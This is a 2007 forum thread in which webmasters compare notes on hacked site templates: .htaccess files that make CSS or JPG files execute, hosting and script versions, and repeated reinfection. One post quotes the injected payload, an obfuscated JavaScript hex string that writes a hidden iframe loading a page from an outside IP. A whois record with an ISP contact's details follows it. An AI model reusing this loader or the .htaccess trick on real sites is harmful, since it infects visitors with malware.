We need to talk SECURITY!!! NOW!!

**Niclu** · November 29th, 2007, 10:02 PM

I got almost the same problem a couple of weeks ago.
They added an 'include css' file to my template, and the css file were infact some exploit thingy they loaded from my ST folder.

The way they executed the file, was to place an htaccess file which was set to execute css files, so it took a while to find it as I didn't look for a css file in my source, but the usual javascript or php include tags.

At another site of mine they also managed to do exactly the same with a jpg file in my st thumbs folder, and a htaccess.

The ST file scanner did Not find the htaccess in my thumbs folder, so I have suggested they include that function in coming ST releases, so we will see.

So if you still have problems, or get it in the future remember to check for htaccess files hidden in your folders.

**Jio** · November 30th, 2007, 02:52 AM

ftp uploading your templates is faster (and more secure) than doing it via the ST interface.
so go with it

**Buster** · November 30th, 2007, 07:08 AM

my sites was hacked by the same way as told TS. I changed all passes but I'm also can't find how they did it. I'm checked my computer, checked my server but found nothing.

**]v[aster** · December 3rd, 2007, 03:55 AM

I too have been a victim of this. I did find something suspicious to go with it. Since I discovered this same code in my templates is the same day I also started seeing this in my referring domains : DELBY FILSECLAB.COM FIREWALL
the following words are actually a link and on both sites it is shown as an extension of my trade script such as :
pornstarshack.com/cgi-bin/at3/admin/DELBY FILSECLAB.COM FIREWALL

I deleted the script code I found in my templates but it says I can't chmod any of my /st files now. Any clue on what to do here

**sun** · December 3rd, 2007, 06:26 AM

Originally Posted by The Professional

<//script//> var s='3C696672616D65207372633D22687474703A2F2F3230332 E3132312E36392E392F65782F7374617469632E70687022207 7696474683D32206865696768743D32207374796C653D22646 973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); <//script//>

I wanna find out who this fucker is and hang him by his balls.....

% [whois.apnic.net node-2]
% Whois data copyright terms http :/ / www .apnic.net/db/dbcopyright.html

inetnum: 203.121.64.0 - 203.121.127.255
netname: TIMETELEKOM
descr: TIME Telecommunications Sdn Bhd
descr: Kuala Lumpur
country: MY
admin-c: AM59-AP
tech-c: AM59-AP
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation'"'"'s account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
mnt-by: APNIC-HM
mnt-lower: MAINT-MY-TTNET
mnt-routes: MAINT-MY-TTNET
changed: hostmaster @ apnic.net 20000510
changed: hostmaster @ apnic.net 20010712
status: ALLOCATED PORTABLE
changed: hm-changed @ apnic.net 20040708
source: APNIC

person: Azmy Mohamad Yusof
nic-hdl: AM59-AP
e-mail: azmy @ isp.time.net.my
e-mail: abuse @ isp.time.net.my
address: TIMEdotNet Bhd
address: Level 3, Lot 14 Jalan U1/26 Glenmarie HICOM Industrial Park 40000
address: Shah Alam Selangor Malaysia
address: [abuse] abuse @ isp.time.net.my
phone: +6-03-50326131
fax-no: +6-03-50326204
country: MY
changed: azmy @ isp.time.net.my 20030217
mnt-by: MAINT-MY-TTNET
source: APNIC

**miroz** · December 3rd, 2007, 07:06 AM

3 days ago I got exactly same shit on my AG SQL templates files!!! WTF

**miroz** · December 4th, 2007, 01:29 AM

Guys, What hosting are you using?

**]v[aster** · December 4th, 2007, 03:13 AM

Hosteasier

**miroz** · December 4th, 2007, 04:58 AM

Originally Posted by ]v[aster

Hosteasier

Did you get exactly same code?

**]v[aster** · December 4th, 2007, 05:49 AM

The script code was the same but there was no I frame. Y?

**miroz** · December 4th, 2007, 06:04 AM

Originally Posted by ]v[aster

The script code was the same but there was no I frame. Y?

I got exactly same code in templates files of AGS. And I got it in the same day (November 29).
I have no ST installed.

**The Professional** · December 4th, 2007, 08:31 AM

this keeps getting more interestings.... do you have arylia installed?

**miroz** · December 4th, 2007, 09:28 AM

Originally Posted by The Professional

this keeps getting more interestings.... do you have arylia installed?

No.
I hit you up by icq, please answer.

**EonBlue** · December 4th, 2007, 10:12 AM

Originally Posted by ]v[aster

I too have been a victim of this. I did find something suspicious to go with it. Since I discovered this same code in my templates is the same day I also started seeing this in my referring domains : DELBY FILSECLAB.COM FIREWALL
the following words are actually a link and on both sites it is shown as an extension of my trade script such as :
pornstarshack.com/cgi-bin/at3/admin/DELBY FILSECLAB.COM FIREWALL

I deleted the script code I found in my templates but it says I can't chmod any of my /st files now. Any clue on what to do here

I don't think that the DELBY FILSECLAB.COM thing is anything malicious. It's a Windows firewall program that can block porn sites:

Code:

http://filseclab.com/eng/products/guardian.htm

**The Professional** · December 4th, 2007, 12:41 PM

**linkex** · December 4th, 2007, 02:28 PM

> The Professional
What release are you running? There has been an exploit in rel<=20070827

I suppose the java script is in one of the links, and not inside the <head> tags or anything? If so when was the link added?

- v0id

**The Professional** · December 4th, 2007, 07:27 PM

just for the benefit of the other readers here... and from the details of the conversation I and void had over icq

I am running the most recent version... and the hack was in the admin index.php of the program... and my linkex output to my pages were left alone

**]v[aster** · December 4th, 2007, 10:05 PM

I found out what that firewall thing was after some more investigation. I did however find some interesting stuff when I searched the IP for that on Google. I got a whois for it as well as a Russian forum of some kind where there appears to be more discussion about this code and ip than we are having here. From what I have seen it appears to be related to some kind of virus or something according to a McAfee report.

**miroz** · December 5th, 2007, 12:34 AM

Originally Posted by ]v[aster

I found out what that firewall thing was after some more investigation. I did however find some interesting stuff when I searched the IP for that on Google. I got a whois for it as well as a Russian forum of some kind where there appears to be more discussion about this code and ip than we are having here. From what I have seen it appears to be related to some kind of virus or something according to a McAfee report.

What forum? link please

**The Professional** · December 5th, 2007, 12:15 PM

hacked yet again today.... I seriously dont' know what's going on
hacked all my main pages directly it seems... I just over wrote them with the template file...

except now one template file is chmod 777 and I can't change it to 444? WTF?!! digging deeper again today... if I cna't figure this shit out... all my sites are for sale... fuck it

Thread: We need to talk SECURITY!!! NOW!!

Thread Tools

same

203.121.69.9

Posting Permissions